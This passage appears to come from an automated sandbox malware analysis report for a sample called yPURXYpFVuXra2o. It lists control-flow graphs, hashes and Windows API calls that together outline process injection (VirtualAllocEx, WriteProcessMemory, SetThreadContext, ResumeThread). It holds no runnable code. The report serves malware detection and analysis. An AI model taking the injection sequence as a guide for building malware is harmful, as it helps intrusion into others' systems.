15c7823-15c782a 1270->1305 1271->1287 1291 15c7960-15c7967 1271->1291 1272->1253 1273->1287 1296 15c79b5-15c79bf 1273->1296 1274->1287 1292 15c7979-15c7980 1274->1292 1275->1253 1284 15c788e-15c7895 1276->1284 1285 15c7875-15c787c 1276->1285 1286 15c7a05-15c7a1d 1277->1286 1278->1253 1279->1287 1288 15c78b1-15c78bd 1279->1288 1293 15c798b 1280->1293 1294 15c7995-15c799c 1280->1294 1281->1253 1282->1290 1283->1287 1310 15c78e1-15c78eb 1283->1310 1284->1287 1299 15c789b-15c78a2 1284->1299 1285->1287 1297 15c7882 1285->1297 1286->1250 1287->1286 1288->1253 1303 15c77fe 1290->1303 1304 15c7805-15c780a 1290->1304 1291->1253 1292->1253 1306 15c7990 1293->1306 1294->1287 1307 15c799e-15c79aa 1294->1307 1295->1253 1296->1253 1308 15c7889 1297->1308 1299->1308 1311 15c7803 1303->1311 1304->1311 1305->1287 1312 15c7830-15c7837 1305->1312 1306->1253 1307->1306 1308->1253 1310->1253 1311->1253 1312->1253 1313->1208 1314->1208
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: V
                                                                                                                                                                                                        • API String ID: 0-1342839628
                                                                                                                                                                                                        • Opcode ID: 605e6d61b312bae0a68744e0194034cb09e2713ddb6e2e06f0e47f0ce1a88f40
                                                                                                                                                                                                        • Instruction ID: 9dcf0eac514f31f553fad7eecf98a219d0e85cdc68700847239a8a324a24c48a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 605e6d61b312bae0a68744e0194034cb09e2713ddb6e2e06f0e47f0ce1a88f40
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F19F30904248CFDB15CFA9C884AAEBBF2FB48711F0485AED4669FA92C734D941CF91
                                                                                                                                                                                                        Function 06C64820 Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1315 6c64820-6c64822 1316 6c64826-6c64893 1315->1316 1317 6c64824-6c64825 1315->1317 1319 6c64895-6c648a7 1316->1319 1320 6c648aa-6c64911 WriteProcessMemory 1316->1320 1317->1316 1319->1320 1322 6c64913-6c64919 1320->1322 1323 6c6491a-6c6496c 1320->1323 1322->1323
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C648FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                        • Opcode ID: 0503b75446ff5a1b8717dfa630a0d3befa57db5cc221290f01a8d0466cda1922
                                                                                                                                                                                                        • Instruction ID: 8b53621a6015f172b9a4b40e7dc43e5edc6bda6d9f1e09f9d5ed8ebfa847291c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0503b75446ff5a1b8717dfa630a0d3befa57db5cc221290f01a8d0466cda1922
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7441BEB5D002488FCF14CFA9D984ADEFBF1BB49304F24941AE815B7250D334AA45CF58
                                                                                                                                                                                                        Function 06C64828 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1328 6c64828-6c64893 1330 6c64895-6c648a7 1328->1330 1331 6c648aa-6c64911 WriteProcessMemory 1328->1331 1330->1331 1333 6c64913-6c64919 1331->1333 1334 6c6491a-6c6496c 1331->1334 1333->1334
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C648FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                        • Opcode ID: be80c44310fa60396fdf369e3985f494cb2a104bd33bba1049c8db8d17b9c398
                                                                                                                                                                                                        • Instruction ID: 454600484aabe67e9347029af41b873fb7217cfffe8d220b3651c871fe512857
                                                                                                                                                                                                        • Opcode Fuzzy Hash: be80c44310fa60396fdf369e3985f494cb2a104bd33bba1049c8db8d17b9c398
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A041ADB5D012589FCF04CFAAD984ADEFBF1BB49314F24942AE815B7250D334AA45CF68
                                                                                                                                                                                                        Function 06C64981 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1339 6c64981-6c64982 1340 6c64986-6c64a50 ReadProcessMemory 1339->1340 1341 6c64984-6c64985 1339->1341 1344 6c64a52-6c64a58 1340->1344 1345 6c64a59-6c64aab 1340->1345 1341->1340 1344->1345
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C64A3A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                        • Opcode ID: 2c697553ac302a53f1204897d9dc188e0667c70d2c0e1df064ad79098b9c5e70
                                                                                                                                                                                                        • Instruction ID: 53256de2393d6161e3e31ce97b1ab45266f73195b628ec4562cf7129a2efa545
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c697553ac302a53f1204897d9dc188e0667c70d2c0e1df064ad79098b9c5e70
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C41BCB9D00258DFCF14CFAAD984AEEFBB1BB58310F14942AE815B7240D734A945CF68
                                                                                                                                                                                                        Function 06C64988 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1350 6c64988-6c64a50 ReadProcessMemory 1353 6c64a52-6c64a58 1350->1353 1354 6c64a59-6c64aab 1350->1354 1353->1354
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C64A3A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                        • Opcode ID: e8cc024c24fb25a65a72ce46f9668df2f96f8cba58c93b5126d8c7fe77982214
                                                                                                                                                                                                        • Instruction ID: 342f2b0d0d2f33bfbbd56f62e7561e10edd98ba6a7066b99cf3b764f58bf91f6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8cc024c24fb25a65a72ce46f9668df2f96f8cba58c93b5126d8c7fe77982214
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF419AB9D002589FCF14CFAAD984AEEFBB1BF49310F10942AE815B7240D735A945CF68
                                                                                                                                                                                                        Function 06C646F8 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1359 6c646f8-6c646fa 1360 6c646fe-6c647c0 VirtualAllocEx 1359->1360 1361 6c646fc-6c646fd 1359->1361 1364 6c647c2-6c647c8 1360->1364 1365 6c647c9-6c64813 1360->1365 1361->1360 1364->1365
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C647AA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                        • Opcode ID: 5e60b27e5f341d880300968fbd8b086450de062fc1c9854952dcc41a254b8580
                                                                                                                                                                                                        • Instruction ID: 865dd95916d27121514efa9f6fea3288538b2c639c8ae96524482414b31d8034
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e60b27e5f341d880300968fbd8b086450de062fc1c9854952dcc41a254b8580
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B54199B8D002589FCF14CFA9D984ADEBBB1BB59310F10941AE815B7240D735A946CF98
                                                                                                                                                                                                        Function 06C64700 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1370 6c64700-6c647c0 VirtualAllocEx 1373 6c647c2-6c647c8 1370->1373 1374 6c647c9-6c64813 1370->1374 1373->1374
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C647AA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                        • Opcode ID: 7535320ade6e2bd11257e15007f73ad3244fa5b629b20f72addba4b69925965b
                                                                                                                                                                                                        • Instruction ID: f0f2e0539f5d145bd95a9ee5946e782476c9fe4a2d1217efb68924a56daafd0e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7535320ade6e2bd11257e15007f73ad3244fa5b629b20f72addba4b69925965b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80419BB9D002589FCF14CFAAD984ADEFBB1BF59310F10941AE815B7240D735A945CFA8
                                                                                                                                                                                                        Function 06C63D58 Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1379 6c63d58-6c63d5a 1380 6c63d5e-6c63dc0 1379->1380 1381 6c63d5c-6c63d5d 1379->1381 1383 6c63dd7-6c63e25 Wow64SetThreadContext 1380->1383 1384 6c63dc2-6c63dd4 1380->1384 1386 6c63e27-6c63e2d 1383->1386 1387 6c63e2e-6c63e7a 1383->1387 1384->1383 1386->1387
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 06C63E0F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                        • Opcode ID: 75dad7a26e297612a34fbb4df55bb8caabb18ebac81c442300c6efe125a2159a
                                                                                                                                                                                                        • Instruction ID: 528a9bc8600edb3ac7bfa7a29f302997004c32077b2d30b80eaaffa1cb111d88
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75dad7a26e297612a34fbb4df55bb8caabb18ebac81c442300c6efe125a2159a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E41AFB5D002589FDB10CFAAD984AEEFBB1BF49314F14942AE419B7240D7389945CF64
                                                                                                                                                                                                        Function 06C63D60 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 06C63E0F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                        • Opcode ID: 0b98d62c0125575ec44397c873b4584a2ece1572af1d64acfa4ddfc5d4237304
                                                                                                                                                                                                        • Instruction ID: 857df5f29ce3079ff6d1bf765c0114595c169a11f4ad2cbfd651f7281fd8cbc4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b98d62c0125575ec44397c873b4584a2ece1572af1d64acfa4ddfc5d4237304
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA41BEB5D002589FDB10CFAAD984AEEFBF1BF48314F14942AE418B7240D738A945CF68
                                                                                                                                                                                                        Function 06C63838 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 06C638B6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                        • Opcode ID: b8ed2926ff272e814a064a5c682231cf0b0c9488cc2ab361f88318bed77d6acb
                                                                                                                                                                                                        • Instruction ID: da9bd0d4982a1c436a2401398ad253977fd702755dc3646878641c46c89e1d27
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8ed2926ff272e814a064a5c682231cf0b0c9488cc2ab361f88318bed77d6acb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5831AAB4D002589FDB10CFAAD884ADEFBB5AB49314F14942AE819B7240D735A901CF98
                                                                                                                                                                                                        Function 06C63836 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 06C638B6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                        • Opcode ID: 24643ff9e5a52efef7cacecd519fb341672bd0033f0cea5039540efc363f230f
                                                                                                                                                                                                        • Instruction ID: 15f2043c8842cf07490791942cd1fcc302151d9372a4fea64715991a01dc186d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24643ff9e5a52efef7cacecd519fb341672bd0033f0cea5039540efc363f230f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F931BBB4D002589FDF10CFAAD984ADEFBB1AF48314F14941AE819B7340D735A905CF98
                                                                                                                                                                                                        Function 015C34CC Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4qXq
                                                                                                                                                                                                        • API String ID: 0-1583228027
                                                                                                                                                                                                        • Opcode ID: 65595c29849d9dff8d62f89482e8ce2c1bce40b414774f16d1ee9483e912f01b
                                                                                                                                                                                                        • Instruction ID: e8495d87d82e35150ad9d132feca25e6c049a16f601ebb56651542e6daa24abb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65595c29849d9dff8d62f89482e8ce2c1bce40b414774f16d1ee9483e912f01b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64714234B402089FEB949EA8D458BBDB7F2FB98B10F10C469E506AB3D4DB758C418B95
                                                                                                                                                                                                        Function 015C3575 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4qXq
                                                                                                                                                                                                        • API String ID: 0-1583228027
                                                                                                                                                                                                        • Opcode ID: 37f7020542bbf060dd275664d17df075347dbecf1412a5f2f05129218a4b4838
                                                                                                                                                                                                        • Instruction ID: d59a66757cc76785af1dcda50266495e435dfd3c80e82be6522c5ceec95cc81c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37f7020542bbf060dd275664d17df075347dbecf1412a5f2f05129218a4b4838
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B613134B402089FEB949EB8D858BBD77F2FB98B10F148469E506AB3D4DE718C418B95
                                                                                                                                                                                                        Function 015C3141 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 0,wq
                                                                                                                                                                                                        • API String ID: 0-2806265506
                                                                                                                                                                                                        • Opcode ID: 936269c088fb45791d379ce3dec955db20ae17136fbb0e40eef1340156e41e3f
                                                                                                                                                                                                        • Instruction ID: 29853f3490849d2c23b05f0607b1dad6507ef6d4f26ff6cf51033af8b271d58b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 936269c088fb45791d379ce3dec955db20ae17136fbb0e40eef1340156e41e3f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F02B312103009BC705A7A0DCD04AABB93AFC8230B048516D4088F390CE384D0AC755
                                                                                                                                                                                                        Function 015C3150 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 0,wq
                                                                                                                                                                                                        • API String ID: 0-2806265506
                                                                                                                                                                                                        • Opcode ID: d3c7ac6fac7d1b93ca8a1d7669a538fd579ffb6fad849ea9ead3fd5521e3258b
                                                                                                                                                                                                        • Instruction ID: 2826f5c20a0ec7a79d7553b6b292e8693250322b12bd70b1fba2e6edc053f708
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3c7ac6fac7d1b93ca8a1d7669a538fd579ffb6fad849ea9ead3fd5521e3258b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACF0A731200714A7D718BAA5D8D489EB79BFFD8630B008919E8094B340CE745C068695
                                                                                                                                                                                                        Function 015C2B88 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: c32f032ec1c29a128613afc45b33e4b1879afb1125fade22dfb8063711d018e5
                                                                                                                                                                                                        • Instruction ID: 4ee659e8b635bd02e707b96a75b2297482862c0ba457cd8d9e744c78db35c7a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c32f032ec1c29a128613afc45b33e4b1879afb1125fade22dfb8063711d018e5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B117C35D002489FDB45EFF4D9502AEBBF2FF49200F10899AC056AB294EB340A05CF81
                                                                                                                                                                                                        Function 015CA938 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f2019dd1dda3ae656b488c681cd3d2f1443290f745d4799ca69b420a7b920725
                                                                                                                                                                                                        • Instruction ID: 253f1272860417d1e1a5ac6466e484bb1c5e7efeecbdc9cf1c32bdda52df23bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2019dd1dda3ae656b488c681cd3d2f1443290f745d4799ca69b420a7b920725
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFA15674A0519DCFDB158FA8C041ABDBFF1BB44701F06896AE495EF691E334D881CB61
                                                                                                                                                                                                        Function 015C4AF2 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a652b66166d2f2bae9572cbe9f8fd7ee8dc7001524651047601c57ef132fe0b1
                                                                                                                                                                                                        • Instruction ID: fd90eb06aff743e0d9b9430af738f006523036a6ccc26faf364804c2eca20333
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a652b66166d2f2bae9572cbe9f8fd7ee8dc7001524651047601c57ef132fe0b1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77A1AF34A04258DFDB158FE8D864EADBBB2FB84B10F25846ED502AF295D770DC41CB85
                                                                                                                                                                                                        Function 015CA948 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4f1de2a35eb984087f5f1b3a8351b1c1a170a33de474881d8a6b332889b07750
                                                                                                                                                                                                        • Instruction ID: e25219e86cd3090f2ae781b3c153fb25a7ab23f3d4a3497219858ea4f64d17f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f1de2a35eb984087f5f1b3a8351b1c1a170a33de474881d8a6b332889b07750
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42A16474A0519DCFDB118FA8C041ABDBEF1BB44701F06896AE495EF691E334D881CB62
                                                                                                                                                                                                        Function 015CB4D8 Relevance: .2, Instructions: 234COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a950dd25f5d20c4393b0e30ea2e8f2b46815221c91e2b5f3bc89275af0c65308
                                                                                                                                                                                                        • Instruction ID: 23b2161d8629318cd8ef857f514e31a510fe2cdcf58e6976167050a352788bba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a950dd25f5d20c4393b0e30ea2e8f2b46815221c91e2b5f3bc89275af0c65308
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5812130A04304CFCB508FA9C8527BABBF1BB46B50F1584AFD466DF292D7758985CB62
                                                                                                                                                                                                        Function 015C4AD9 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
